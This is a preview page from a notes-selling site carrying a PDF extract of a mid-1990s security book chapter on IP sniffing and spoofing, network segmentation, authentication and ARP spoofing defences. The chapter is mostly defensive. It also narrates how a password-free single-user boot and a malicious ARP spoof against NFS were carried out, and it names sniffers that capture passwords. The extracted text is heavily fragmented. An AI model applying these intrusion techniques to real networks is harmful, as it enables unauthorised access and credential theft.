Search for notes by fellow students, in your own course and all over the country.

Browse our notes for titles which look like what you need, you can preview any of the notes via a sample of the contents. After you're happy these are the notes you're after simply pop them into your shopping cart.

My Basket

You have nothing in your shopping cart yet.

Title: Hacking - Firewalls And Networks How To Hack Into Remote Computers
Description: 6 niffing and spoofing are security threats that target the lower layers of the networking infrastructure supporting applications that use the Internet. Users do not interact directly with these lower layers and are typically completely unaware that they exist. Without a deliberate consideration of these threats, it is impossible to build effective security into the higher levels. Sniffing is a passive security attack in which a machine separate from the intended destination reads data on a network. The term “sniffing” comes from the notion of “sniffing the ether” in an Ethernet network and is a bad pun on the two meanings of the word “ether.” Passive security attacks are those that do not alter the normal flow of data on a communication link or inject data into the link.

Document Preview

Extracts from the notes are below, to see the PDF you'll receive please use the links above


www
...
com

PA

R
RT PA T PART

T PART P
AR
T

PART PART

P

AR

RT

RT

PAR

PA

II
ART PART P
T P
A

Gaining Access and Securing
the Gateway
6
7

How to Build a Firewall
...
429

9

p1vPHCP/tr2

IP Spoofing and Sniffing
...
535

Internet Security Pro Ref

557-7 dc 1-23-96

Parts LP#2

257

IP Spoofing and Sniffing
HAPTER CH
R C
A

AP

ER
PT

CHAPTER CH

A

niffing and spoofing are security threats that target the
lower layers of the networking infrastructure supporting
applications that use the Internet
...
Without a deliberate consideration of these threats, it is impossible to
build effective security into the higher levels
...
The term “sniffing” comes from the notion of
“sniffing the ether” in an Ethernet network and is a
bad pun on the two meanings of the word “ether
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

ER

S

PT

IP Spoofing and Sniffing

CHAPTER CH
A

CHAPTER CH

ER

6

PT

TE

258

Part II: Gaining Access and Securing the Gateway

Spoofing is an active security attack in which one machine on the network masquerades as a
different machine
...
This masquerade aims to
fool other machines on the network into accepting the impostor as an original, either to lure
the other machines into sending it data or to allow it to alter data
...
” Such deception can have grave consequences
because notions of trust are central to many networking systems
...
Sniffing gathers
sufficient information to make the deception believable
...
A variety of types of machines need to have this capability
...
Another example of a device that incorporates sniffing is one typically
marketed as a “network analyzer
...
These problems
can involve unusual interactions between more than just one or two machines and sometimes
involve a variety of protocols interacting in strange ways
...
However, their very existence
implies that a malicious person could use such a device or modify an existing machine to snoop
on network traffic
...
Besides these high-level data, lowlevel information might be used to mount an active attack on data in another computer
system
...
Each network interface has a hardware-layer
address that should differ from all hardware-layer addresses of all other network interfaces on
the network
...
Normally, a network
interface will only respond to a data frame carrying either its own hardware-layer address in
the frame’s destination field or the “broadcast address” in the destination field
...
This interrupt gets the attention
of the operating system, and passes the data in the frame to the operating system for further
processing
...
When the sender wants to
get the attention of the operating systems of all hosts on the network, he or she uses
the “broadcast address
...
” In promiscuous mode, network interfaces generate a hardware interrupt to the CPU for every frame they encounter, not just the ones with
their own address or the “broadcast address
...


At times, you may hear network administrators talk about their networking trouble spots—
when they observe failures in a localized area
...
All of the packets travel
through all parts of the Ethernet segment
...
Bridges,
switches, and routers divide segments from each other, but low-level devices that operate on
one bit at a time, such as repeaters and hubs, do not divide segments from each other
...
All
frames traveling in one part of the segment also travel in the other part
...
A sniffer puts a network interface in promiscuous mode so that the sniffer can
monitor each data packet on the network segment
...
With an analyzer, you can determine how much of the traffic is due
to which network protocols, which hosts are the source of most of the traffic, and which hosts
are the destination of most of the traffic
...
With
a sufficiently powerful CPU, you can also do the analysis in real time
...
When
you examine these closely, you notice that they are nothing more than a portable computer
with an Ethernet card and some special software
...
It is also easy to download shareware and freeware
sniffing software from the Internet or various bulletin board systems
...
However, the availability of this
software also means that malicious computer users with access to a network can capture all the
data flowing through the network
...
Eventually, the malicious
user will run out of space to store the data—the network I use often has 1000 packets per
second flowing on it
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

259

260

Part II: Gaining Access and Securing the Gateway

Note Esniff
...
x
...
It is quite effective at capturing all
usernames and passwords entered by users for telnet, rlogin, and FTP
...
0
...
It uses the libpcap library for portably interfacing with promiscuous mode
network interfaces
...
ee
...
gov
...
The latest version of NetMan is available via
anonymous FTP to ftp
...
curtin
...
au in the directory /pub/netman
...
eu
...
net in the directory /pub/networking/inet/ethernet/
...
When
run by an ordinary, unprivileged user, it does not put the network interface into
promiscuous mode
...
Systems administrators concerned about sniffing should remove user
execution privileges from this program
...
These kinds of information include the
following:
s Passwords
s Financial account numbers
s Private data
s Low-level protocol information
The following subsections are intended to provide examples of these kinds
...
Typical users type
a password at least once a day
...
Users usually are very careful about guarding their password by not sharing it with
anyone and not writing it down anywhere
...
When the user types any of these passwords, the system does not echo them to the
computer screen to ensure that no one will see them
...
End users do not realize just how easily these passwords can be found by someone using a
simple and common piece of software
...
This apprehension may be partly because of
the carelessness most retailers display when tearing up or returning carbons of credit card
receipts
...
Although the Internet is
by no means bulletproof, the most likely location for the loss of privacy to occur is at the
endpoints of the transmission
...

However, much larger potential losses exist for businesses that conduct electronic funds
transfer or electronic document interchange over a computer network
...

Most credit card fraud of this kind involves only a few thousand dollars per incident
...
Many e-mail messages have been
publicized without the permission of the sender or receiver
...
A crucial
piece of evidence was backup tapes of PROFS e-mail on a National Security Agency computer
...
It is not at all uncommon for e-mail to contain confidential business information or
personal information
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

261

262

Part II: Gaining Access and Securing the Gateway

Sniffing Low-Level Protocol Information
Information network protocols send between computers includes hardware addresses of local
network interfaces, the IP addresses of remote network interfaces, IP routing information, and
sequence numbers assigned to bytes on a TCP connection
...
See the second part of this chapter for more information on how these data can pose
risks for the security of a network
...
After an attacker has
this kind of information, he or she is in a position to turn a passive attack into an active attack
with even greater potential for damage
...
It was not practical to
hardwire each terminal to the host, and users needed to use more than one host
...
The terminals connected to the switch so that the user had a choice of
hosts
...
The switch had several thousand ports and was, in theory,
capable of setting up connections between any pair of ports
...
Figure 6
...


Figure 6
...


~2500 Input
~400 Output
IBM Mainframe

DEC Vax
[SN Switcher]
Multiplexor
DEC Vax

To make the system more flexible, the central computing facility was changed to a new system
that uses a set of (DEC 550) Ethernet terminal servers with ports connected to the switch,
rather than the old system, which used a fixed number of switch ports connected to each host
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

263

IP Spoofing and Sniffing

Offices have a cable running from a wallplate to a wiring closet punchdown block
...
The
multiplexers serve to decrease the number of cables that need to be long
...
No two offices share any
media
...
6
...


Figure 6
...


Terminal
Server

~2500 Input
~400 Output

IBM Mainframe

Terminal
Server

Ethernet
Hub

DEC Vax

[SN Switcher]

Multiplexor
Terminal
Server

DEC Vax

Rather than using simple terminals, however, most computer users have a computer on their
desktop that they use in addition to the Central Computing computers
...
The number of computer users, however, has
grown rapidly over the past decade and the switch is no longer adequate
...

To phase out the switch, Central Computing installed an Ethernet hub in the basement of
each building next to the punchdown block used to support both the switch multiplexer and
the telephone lines
...
Hubs also were placed in the wiring
closets on each floor of each building that connected to the basement hub
...
The new wiring
scheme neatly parallels the old and was changed relatively inexpensively
...
3 illustrates
the system after the networking of user areas
...
4 shows the user area networking detail
...
3
Case study system after
networking of user areas
...
4
Case study user area
networking detail
...
From a logical standpoint, it can get to the
same places, but the data can and does go to many other places as well
...
Different departments are located in the same building
...
Ordinary staff, the managers that supervise them, and middle management all are
located in the same building
...

In addition to nosiness and competition, a variety of people sharing the same physical media in
the new wiring scheme, could easily misuse the network
...
Any sensitive information that they transmit is no longer
limited to a direct path between the user’s machine and the final destination, anyone in the
building can intercept the information with a sniffer
...

The network in the case study fails miserably in the prevention of sniffing
...
The following section describes how to design a network that limits the sharing of
media to prevent sniffing by untrustworthy machines
...


Network Segmentation
A network segment consists of a set of machines that share low-level devices and wiring and see
the same set of data on their network interfaces
...
An ordinary hub is essentially a multiport repeater; all the wires attached to it are
part of the same segment
...
The wires on opposite
sides of a bridge are not part of the same segment because the bridge filters out some of the
packets flowing through it
...
Some
packets flow through the bridge, but not all
...
Any device on one side of the bridge can still send packets to any device on
the other side of the bridge
...
Just as bridges can be used to set up boundaries between segments, so can
switches
...
Because they limit the flow of all data, a
careful introduction of bridges and switches can be used to limit the flow of sensitive information and prevent sniffing on untrustworthy machines
...
They enhance performance by reducing the collision rate of segments,
which is much higher without these components
...
As one is planning the network infrastructure one should keep these
other factors in mind as well
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

265

266

Part II: Gaining Access and Securing the Gateway

A segment is a subset of machines on the same subnet
...
Hence, they also form borders between segments in a network
...
Machines on different subnets are always
part of different segments
...
Dividing a network into subnets with routers is
a more radical solution to the sniffing problem than dividing subnets into segments
...

Segmentation of a network is the primary tool one has in fighting sniffing
...
This ideal can be accomplished by using switches instead of
hubs to connect to individual machines in a 10BASE-T network
...
Such solutions all involve
the notion of trust between machines
...


Understanding Trust
Typically, one thinks of trust at the application layer between file servers and clients
...
However, this notion of trust extends to
lower-level network devices as well
...
Hosts are trusting
of routers and routers are trusted machines
...
A machine sending data considered private on a particular
network segment must trust all machines on that network segment
...

The threat of sniffing comes from someone installing sniffing software on a machine normally
on the network, someone taking a sniffer into a room and jacking it into the network connections available there, or even installing an unauthorized network connection to sniff
...


Hardware Barriers
To create trustworthy segments, you must set up barriers between secure segments and
insecure segments
...
An example of such a segment would be a segment that does
not extend outside the machine room of a computing facility
...
The personal trust between staff
members is mirrored by the mutual trust between the systems for which they are responsible
...
Insecure segments need not be trusted if those segments carry only public
or non-critical data
...
No guarantee of absolute security is made for the information stored
...

It is less clear where to draw the line in a more professional business setting
...
Even if a
person can be trusted personally in an ethical sense, he or she may not be trustworthy technically to administer a machine in such a way that an attacker could not abuse the machine
under his or her control
...
5 (an arrow
points from the trusting machine to the trusted machine)
...
One
such partitioning is shown in figure 6
...


Figure 6
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

268

Part II: Gaining Access and Securing the Gateway

Figure 6
...
5 that
satisfies the lack of trust
between machines
...
How secure you make a segment is related to how much control
you take away from the technically untrustworthy end user who uses the network in a location
with limited physical security
...
However, to actually
remove control from the end user and prevent the end user machine from being used for
sniffing, the machine on the end user’s desk essentially becomes a terminal
...

If the end user cannot be trusted or if the software on a desktop machine could be altered by
the authorized end user because of the machine’s physical location, then the machine should
not be a personal computer
...
1, or Windows 95
...
Hence, any user can run a sniffer on such a
system
...
No
system administrator can restrict what the end user can and cannot do with one of these
machines
...
Essentially, they become terminals that offload some of the work from the central, physically secure
server
...
These operating systems only allow access to certain hardware level operations to superusers
...
It is still possible to bring alternative boot media to most workstation-class operating
systems and obtain superuser privileges without knowing the superuser password
...
Usually the only software
that can be installed by the user is the operating system
...
The system administrator in charge of the local network had designated the workstations secure enough to be trusted by the file server to NFS mount a
file system containing mission-critical data directories
...
After a self-test, it came up with a
boot monitor prompt
...
As it turned out, one command (auto) would boot the
workstation directly into Unix multiuser mode, which is what the system administrator had always done
...
When I tried the alternative command (boot), the workstation booted directly into Unix single-user mode and gave the person at the keyboard
superuser privileges without being required to issue a password
...
The documentation supplied with the workstations did not
mention it
...
Password protection made these workstations sufficiently secure to be
trusted to mount the mission-critical disks
...
On other
systems, the password may be circumvented with other methods
...
By obtaining superuser
privileges, a user could not only sniff data, but do much more serious damage
...
In these cases, a secure segment is probably out of the
question unless the end users are impeccably ethical and technically competent to maintain
system security on the machines they control (a machine administered by someone without

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

269

270

Part II: Gaining Access and Securing the Gateway

security training is likely to be broken into by an attacker and used as a base of operations to
attack other machines, including sniffing attacks)
...
That is, while any of the machines on
the segment could be used as a sniffer, the users trust that they will not be based on the following:
s The physical security of the machines
s The technical competence of the other users to prevent outsiders from gaining control of
one of the machines remotely
s The personal integrity of the other users
It is possible to build a secure subnet or local area network out of a set of segments that each
have mutually trusting machines
...
Machines that need to communicate across segment boundaries should only
do so with data that is not private
...
Such an arrangement presumes that the end users trust the staff operating these central
facilities
...


Connecting Segments of One-Way Trust
Consider, for example, the simple situation of two segments of mutual trust
...
However, the machines in the first segment are communicating less
sensitive information than those in the second segment
...
In this case, it is allowable for the data
from the first segment to flow through the second segment
...

One-way trust is fairly common between secure segments and other types of segments
...
Similarly, one way
trust may exist between a segment of mutual trust and an insecure segment
...
Tree
diagrams represent hierarchies graphically
...

Thus, the more secure segments are closer to the root of the tree and less secure segments are
closer to the leaves—insecure segments are leaves in the tree representing the one-way trust
hierarchy
...
The reason for this is that such a setup isn’t safe from sniffing
...

However, most users expect a higher level of security than any such setup could provide
...


Case Study: A Small Department Subnet
A good case study of a network system at risk is in building at the university where I work
...
On the
lower floor are several rooms with computers that are accessible by clients of Computer
Science, offices for professional staff members in each of the three departments, and the
Computer Science machine room
...

The rooms in which clients access the network are not secure
...
They are not mutually trusting of all
members of other departments
...
They
cannot trust the professional staff they supervise because they work with sensitive employee
records dealing with performance reviews, salary recommendations, and compete for resources
provided by higher levels of management
...
These suites may be considered secure relative to the offices of the
staff they supervise
...

6
...
Finally, the Computer Science machine room is secure
...
7
Trust relationships
between groups of
machines in case study
...
The Mathematics
management suite must be placed on a separate segment
...
In an exact parallel, the Computer Science management suite can have a
segment with data flowing through it to and from the Computer Science staff segment
...
Notice the fact that we have a hierarchy of trust being in effect here
...

Now consider the wiring system available to service these two floors
...

The upper floor has a primary communication closet immediately above it connected by a
conduit through the flooring
...
The primary closet connects, via a wiring conduit, to a
secondary communication closet on the opposite side of the upper floor close to the Computer
Science management suite
...
The minimum cost solution is simply to locate a set of hubs in each communications closet and connect all the hubs together to form a single segment
...
If cost is not an issue, each of the proposed segments can simply
be connected by a switch
...
8 shows such a solution
...
The Mathematics
management suite has a segment that bears the burden of traffic from the staff segment
...

Computer Science has five separate segments joined by a switch
...
Computer Science, Mathematics, and
English each have a separate subnet
...

The solution shown in figure 6
...
Absolute
security is not provided since it is still possible for anyone to hook up a sniffer on any of the
segments
...
The areas where more security is needed have higher levels of
physical security as well
...
Also, except on the insecure Computer Science client

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

273

IP Spoofing and Sniffing

segment, there is trust between the authorized users of the machines sharing a segment
...


Computer Science
Management

Computer Science
Staff

Hub

Hub

Figure 6
...


Hub

Router
Switch

Hub

Hub
Hub

Computer Science
Staff

Computer Science
Machine Room

Computer Science
Clients

English
Staff

Hub

Math
Staff

You can learn several things from looking at the case study and its solution:
s A minimum cost solution is not likely to provide for security
...

s Different approaches to cost and performance trade-offs may be combined in a secure
system
...

s A single solution may provide both security and enhance performance as in the solution
shown for Computer Science
...
There is almost no cost
difference between having a single segment for Mathematics and the solution shown
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

274

Part II: Gaining Access and Securing the Gateway

Tip

A simple hardware barrier that is inexpensive and has the potential for increasing
network performance is the installation of a bridge between your machine room and
the rest of your facility
...
A bridge placed between the machine room and
the rest of the facility prevents this traffic from escaping to less secure areas and
reduces the collision rate outside the machine room
...
In fact, a low-cost personal computer may be
configured for this purpose with free software such as Drawbridge
...
Drawbridge is also capable of filtering operations and can act
as a cheap alternative to a firewall in small networks
...

So far, this section has covered how to avoid sniffing of data from the local part of the Internet
...
However, many security breaches are aided either knowingly or unknowingly by
internal personnel
...
Not only is physical security
greater for the more trusted segments, but so is the technical competence of those in charge of
the computer systems
...
Systems that can accept commands from remote locations
must be administered by those technically competent enough to prevent remote intruders by
not making mistakes that will allow remote intruders to gain access to the systems
...
When building medieval fortresses, the last line of
defense was typically the most formidable but could only protect those who would be left
inside after the outer defenses had been breached
...
The local
hardware defenses may limit intrusion into the local systems
...
One
extreme that preserves security is simply not to permit access from remote locations
...
Legitimate Internet sessions initiated inside a network
with those outside must also be protected
...
The best way to deal with this problem is simply not to transmit cleartext
passwords across the network
...
Several different methods are in use to
provide this kind of protection:
s The rlogin family of protocols
s Using encrypted passwords
s Zero knowledge authentication

The rlogin Family of Protocols
The rlogin protocol, originally used with Unix-to-Unix terminal sessions, uses end-to-end
mutual trust to avoid the transmission of any form of password
...
The user places a file on the server indicating
what combinations of username and hostname may connect to a particular account on
machines using the server
...

This file is called the rhosts file
...
rhosts,” but on non-Unix systems using this protocol, the file may have to have a
different name to satisfy the constraints imposed for filenames or different mechanisms used to
store the information about what users are accepted on what trusted systems
...
The requirement that the rhosts file not be altered is
obvious—if someone modified the rhosts file, he or she could connect to the account via the
rlogin protocol without the permission of the legitimate user
...
If an
attacker gains access to another account on the machine hosting the rlogin server, the attacker
can read the rhosts file of a user and target the user for an indirect attack
...

Another file used by some servers for the rlogin protocol is called the host equivalence file,
which is named “/etc/hosts
...
Any user of any host
listed in the host equivalence file may access an account with the same username on the
machine on which the host equivalence file exists without presenting a password
...
However, it opens up users to the risks of ARP spoofing and
name server spoofing (both covered later in this chapter) without the implicit consent they give
to that risk when creating their own rhosts file
...
Users without the network savvy to create an
rhosts file are being put at risk from a threat they have no possibility of understanding
...
The family is collectively referred to as the r-commands
...
rcp is preferred over FTP
for its security and ease of use
...


The rlogin protocol remains vulnerable to ARP spoofing and DNS spoofing (discussed later in
this chapter)
...
For example, when you start an rlogin terminal session from a client’s or
colleague’s office, the client’s or colleague’s machine is not listed in your rhosts
...


Note The r-commands are not limited to Unix
...
Many TCP/IP software packages for the PC offer r-command clients
...
There are many freeware packages that provide a similar server for any PC
with winsock
...


Problems with rlogin
As mentioned earlier, on a machine with any server for programs in the rlogin protocol family
it is critical that only the user can modify his or her rhosts file
...
Note that if your home directory is on an NFS mounted file system exported
to someone else’s machine your rhosts file is vulnerable to simple attacks on NFS
...
The NFS
server is fooled into believing you are accessing your files because it trusts the other machine to
authenticate its users
...

If an attacker is able to modify the superuser rlogin file or gain access to any account listed in
it, such access can be leveraged into a very serious attack
...
Unlike
rlogin or telnet, rsh does not require a pseudo-tty
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

Do not confuse the rexec commands (rexec and rcmd) with the r-commands
...
It will then
execute a single shell command
...
Also, it provides two distinct error conditions, one for an
invalid username and one for an invalid password
...
A standard login program will not provide this distinction and provide
a mechanism to prevent rapid-fire attempts to log in
...


Using Encrypted Passwords
Another solution is to use encrypted passwords over the network
...
Even with encryption, a sniffer can still record the
encrypted password and decipher the encrypted password at his or her leisure
...
If the sender and receiver are
closely synchronized, the sniffer must replay the encrypted password within one tick of the two
machines’ shared clock
...
One way around this lack of close synchronization is to set a limited number of attempts at typing the password correctly
...
The attacker would decrypt it for repeated
use at a later time
...
This encryption
technique is no longer considered particularly secure against brute force cryptographic attacks
where all likely passwords are encrypted with the same algorithm used by the password file
...
Hence, poorly chosen (for example,
dictionary words) or short passwords are particularly easy to crack by brute force
...
In public
key cryptography (also called asymmetric cryptography), you use separate keys for encryption
and decryption—the decryption key is not computable from the encryption key
...

The server then decrypts the password to verify the authenticity of the user
...
It also allows the server to
use a time-dependent public key to prevent password replay or brute force decryption of a
relatively short password
...

It uses Secure RPC (Remote Procedure Call) authentication
...
Secure RPC uses public key cryptography using the
patented Diffy-Hellman algorithm
...

SRA can be obtained by anonymous ftp to coast
...
purdue
...


The use of Kerberos also prevents cleartext passwords from being sent across the network
...
This avoids having servers trust
clients to do the authentication, as the rlogin protocol must do
...


Zero-Knowledge Authentication
Another mechanism for secure authentication without passwords is zero-knowledge proofs
...
When the client connects to the server, the server queries the client
about a set of digits in a small set of positions in the sequence
...
The server
will query for a different set of positions each time the client connects
...
You store the digit sequence held by the
client on a credit card sized device or even in a ring worn by the user
...

RFC 1704 and RFC 1750 provide a good background in the principles of authentication and
the current state of encryption technology for the Internet
...
3 uses a challenge / response technique in conjunction with DES encryption for
authentication
...
uu
...

S/KEY from Bellcore uses the response / challenge technique as well
...
bellcore
...
S/Key has support for
a variety of platforms, including Unix, Macintosh, and Windows, to generate the onetime
password used as a response to a challenge
...

RFC 1760 describes the system in technical detail
...
Public key cryptography is sometimes called asymmetric because different keys are used for encryption and
decryption with no practical way to compute one key from the other key
...
Just as
public key cryptography can be used to authenticate a user, it can also be used to solve the key
distribution problem of a symmetric encryption technique
...
Thus, the key cannot be
sniffed and used to decrypt the rest of the session
...
Because the entire contents of a TCP
connection are encrypted, you can send credit card numbers over the Internet without
worrying that someone will intercept them at one of the many routers between the user’s Web
browser and the merchant’s Web site
...

To take advantage of session encryption on the Web, you must have compatible encryption
techniques being used on both the browser and the Web server
...
Any vendor doing business on the Web should be quite
clear about what encryption techniques the server supports and give a list of some of the
browsers that support it so that a user will know in advance if the information being sent is
protected by encryption
...


Spoofing
Spoofing can occur at all layers of the IP system
...
All application layer
protocols are at risk if the lower layers have been compromised
...
This includes
routing protocols and the DNS naming protocol
...


Hardware Address Spoofing
At the hardware layer, any network interface for a shared-media network will have a hardware
interface address
...
A much more

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

279

280

Part II: Gaining Access and Securing the Gateway

serious problem occurs if the network interface can alter the source address and send data that
appears to come from various source addresses
...
It uses this
hardware address to match the variety of destination addresses of the frames it sees
...
Packets coming from the
operating system to the interface do not typically specify a source address; the interface always
puts its hardware address in the source field
...
When another host examines a packet containing a hardware source address associated with an interface of a particular machine, it assumes that the packet originated on that
machine and accepts it as authentic
...
Regardless, many interface cards
are configurable and allow host software to specify a source address other than the one assigned
by the manufacturer
...

DECNet, for example, uses 16-bit identifiers and requires that the leading 32 bits of the
hardware address be set to a fixed value to indicate that the packet is a DECNet packet
...

To see how common it is for a network interface to be able to spoof the source address,
however, recall how a bridge works
...
A PC with two software configurable
interfaces can be configured to be used as a bridge
...
The drawbridge software mentioned in the previous section on
hardware barriers to prevent sniffing is compatible with most Ethernet boards which means
most Ethernet boards will permit source address spoofing
...
Unfortunately, there is very little you can do to protect yourself against such
deviousness
...
Unfortunately,
currently there are no protections in the IP network layer that will prevent a hardware address
spoofer from disguising one machine as another
...
Fortunately, hardware
address spoofing is difficult (relative to many other spoofing methods) and requires penetration
of physical security
...
You need to trace the wiring to be certain no one has connected an

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

unauthorized machine and you also need to check to see if the authorized machines are using
the hardware address they should
...

All machines not in physically secure locations can be connected to hubs in secure locations
...
Thus, you can configure the hub to accept only
packets with hardware addresses matching the manufacturer-assigned hardware address of the
interface on the authorized machine
...
Clearly, you are still relying on physical
security to be sure that the hub, wires, and authorized machine remain as they should
...
However, they are marketed as “active hubs” or “filtering hubs
...


ARP Spoofing
A more common form of spoofing that is accidental is ARP spoofing
...
ARP is not part of IP but part of these
Ethernet-like protocols; ARP supports IP and arbitrary network-layer protocols
...
For local IP destinations, the
hardware address to use will be the hardware address of the destination interface
...


How ARP and ARP Spoofing Work
To find the hardware address, the host sends out an ARP request using the hardware broadcast
address
...
The ARP request is essentially asking the question, “What is the hardware
address corresponding to the IP address I have here?” Typically, only the host with the
matching IP address sends an ARP reply and the remaining hosts ignore the ARP request
...

Other hosts could potentially store the association between hardware address and IP address of
the sender of the request for future reference
...
It will almost certainly send an IP datagram in reply to the IP datagram it is
about to receive
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

281

282

Part II: Gaining Access and Securing the Gateway

The association between the hardware address and the IP address of other machines on a
network is stored in an ARP cache on each host
...
If the host finds an
entry for the IP destination address, it need not make an ARP request
...

Thus, when the ARP cache entry for a machine expires, an ARP request goes out to refresh the
entry
...
The entries for its interface’s
hardware will disappear from the ARP caches in the other machines on the network
...
Before that point in time, IP datagrams are sent out but are not received
...
If someone replaces
its interface, the now up and running machine will have a new hardware address and will use
that new hardware address in ARP replies
...

Because you expect the IP address to hardware address association will change over time, the
potential exists that the change may be legitimate
...
Someone
may inadvertently assign a machine the same IP address held by another machine
...

On multiuser systems, the system administrator is typically the only one who can set the IP
addresses of the network interface(s)
...
In addition, bureaucracies often separate
system administrators and network administrators that use the same network
...
Duplication
can occur either by copying the network configuration from one personal computer to another
without the end user knowing the need for IP addresses to be unique
...

When two machines end up with the same IP address, both of them will naturally reply to an
ARP request for that address
...
These replies will arrive in rapid succession, typically separated by at most a few
milliseconds
...
Other operating systems will discard ARP replies that correspond to
IP addresses already in the cache
...

Thus, depending on the mechanism used to process duplicate ARP replies, if a spoofer wants
to be the target of the IP datagrams being sent to a particular IP address from a particular host,
it needs to make sure it is either the first or the last to reply to ARP requests made by that
particular host
...
An attacker can simply use a machine assigned, via the normal operating system
configuration mechanisms, the same IP address as a machine that is currently not working
...
The attacker does not need to have direct access to the power switch on the machine
...

An alternative to disconnecting its power is to disconnect it from the network at some point in
the network wiring scheme
...
Doing so is less likely to draw
attention or result in confusion from the machine’s user or administrator
...
The room is equipped with a Unix workstation and
a $15,000 ceiling-mounted video projector projecting onto a $2,000 eight-foot diameter
screen
...
The new workstation came in and was being configured to match to the configuration of the workstation in the
presentation room
...
The technician in charge of configuring the new workstation
looked up the IP address of the workstation in the presentation room and entered it into the
dialog box
...
The systems staff wanted to be
sure it was working correctly because it was difficult to fix after it was installed in the presentation room
...

The next morning a presentation started in the presentation room with the old workstation
...

Shortly after the new workstation booted, the presentation came to a complete halt
...
The workstation in the presentation room had
established a TCP/IP connection with the better machine and the presenter was creating the
illusion that the program was running on the old workstation
...
As the presentation progressed, the ongoing IP datagrams from the better computer to the old workstation used the
cache entry created at the beginning of the presentation
...
The
first time the ARP cache entry expired, the old workstation replied appropriately
...
Both the old and
new workstations replied to the computer running the demonstration software
...
The
new workstation did not know what to do with these datagrams and promptly sent a TCP/IP
reset message in reply, resulting in the shutdown of the demonstration program
...

Needless to say, the presenter was upset
...


A Case Study: Malicious ARP Spoofing
As mentioned earlier, I work at a university where Computer Science allows its clients (students) temporary access to its computers
...
One of these clients has a laptop running Unix
...
This
particular user has created a copy of the workstation password file on his laptop and has
superuser privileges on his own laptop, which runs Unix with NFS
...
He shuts down the workstation and jacks his laptop into our network
...
Then, he launches an attack by telling his workstation to
NFS mount our mission-critical filesystem
...
It then proceeds to send information needed to access the NFS daemon back to the
IP address that just made the mount request
...
It puts the
reply on hold and makes an ARP broadcast to determine the hardware address to which to
send the reply
...
The low-level software
takes the response, caches it, and uses it to take the reply out of the holding bin and send it out
the Ethernet interface
...


Preventing an ARP Spoof
It is not particularly satisfying to simply detect ARP spoofing, which only identifies a problem
after it has already occurred
...
The devious thing about an
ARP spoof is that the attack is really directed at the machine being deceived, not the machine
whose IP address is being taken over
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

The deception is useful to the ARP spoofer because the legitimate holder of the IP address is
trusted in some way by the machine being deceived
...
Ideally, machines extending
such trust should simply not use ARP to identify the hardware addresses of the machines they
trust
...
Instead, the
hardware address of the trusted machines should be loaded as permanent entries into the ARP
cache of the trusting machine
...
Sending a datagram to an IP address associated with a permanent
ARP cache entry will never result in an ARP request
...
It seems unlikely that any
operating system would overwrite a permanent ARP cache entry with an unsolicited ARP
reply
...
Of course, it will also send IP data to the machine even if the machine has been down
for some time
...
Finally, ARP caches may be of
limited size, limiting the number of permanent entries or further limiting the time a dynamic
entry spends in the cache
...
This command has several options
...
The following output
is an example of what you would see on a Windows 95 machine:
Interface: 147
...
112
...
226
...
1
aa-00-04-00-bc-06
147
...
112
...
226
...
101
08-00-2b-18-93-68
147
...
112
...
226
...
103
00-00-c0-63-33-2d
147
...
112
...
226
...
105
08-00-20-0b-7b-df
147
...
112
...
226
...
124
08-00-2b-1c-08-68
147
...
112
...
The -d option deletes the entry with
the given IP address from the ARP cache
...
226
...
101

Inserting a Permanent ARP Cache Entry
The -s option inserts a permanent (static) ARP cache entry for the given IP address
...

arp -s 147
...
112
...
A somewhat more secure, but tedious,
method is to use an operating system dependent method for querying the machine in question
for its own hardware address from its console
...


Inserting Many Permanent ARP Cache Entries
The -f option loads permanent entries into the ARP cache from a file containing an IP address
to hardware address database
...
The -f option to the arp command is not available on all
systems
...
However, it is really just a substitute for a series of arp commands with the -s option
...
An ARP server responds to ARP requests on behalf of another machine by consulting
(permanent) entries in its own ARP cache
...
However, configuring a machine to
believe only in the ARP server is a difficult task for most operating systems
...
The ARP server will send out a reply to the same requests
as a potential ARP spoofer
...
You cannot be sure because as you have
seen, much depends on the exact timing of the replies and the algorithms used to manage the
ARP cache
...
You can
separate the trusted hosts (those with IP addresses that might benefit an attacker using ARP
spoofing) from subnets on which an attacker might obtain access
...
Such
subnetting prevents a spoofer from powering down one of the trusted machines and attaching
to the subnet on which ARP requests from the trusting machine are broadcast
...

However, this setup simply places the router in the position of being deceived by an ARP
spoof
...
If the trusted
machines are on a separate subnet that is susceptible to ARP spoofing, the router for that
subnet must bear the burden of ensuring that IP datagrams get to their legitimate destination
...

Finally, it is also important that trusted machines be protected from an ARP spoofer that is
attempting to masquerade as the router
...


Sniffing Case Study Revisited
To illustrate ARP spoofing in a familiar context, recall the solution to the sniffing problem
adopted by Computer Science in the case study earlier in the chapter (see fig
...
7)
...
These segments connect to a switch in the Computer Science
machine room
...
All five segments in Computer Science are part of a single subnet
...
Thus, an ARP spoof attack may be launched from any of the
segments
...

The analysis of the situation for the ARP spoofing problem is analogous to that for the sniffing
problem
...
The hardware barrier used to control ARP spoofing is a router to induce
subnetting rather than a bridge or a switch to induce segmenting
...
However, the two staff segments that were kept separate for reasons other than satisfying the trust
constraints may share a subnet
...

The subnet for the machine room can use high-speed network media such as Fast Ethernet,
FDDI, or HyperChannel
...

Problems arise, however, with respect to routing protocols
...
The Central Computing router will refuse
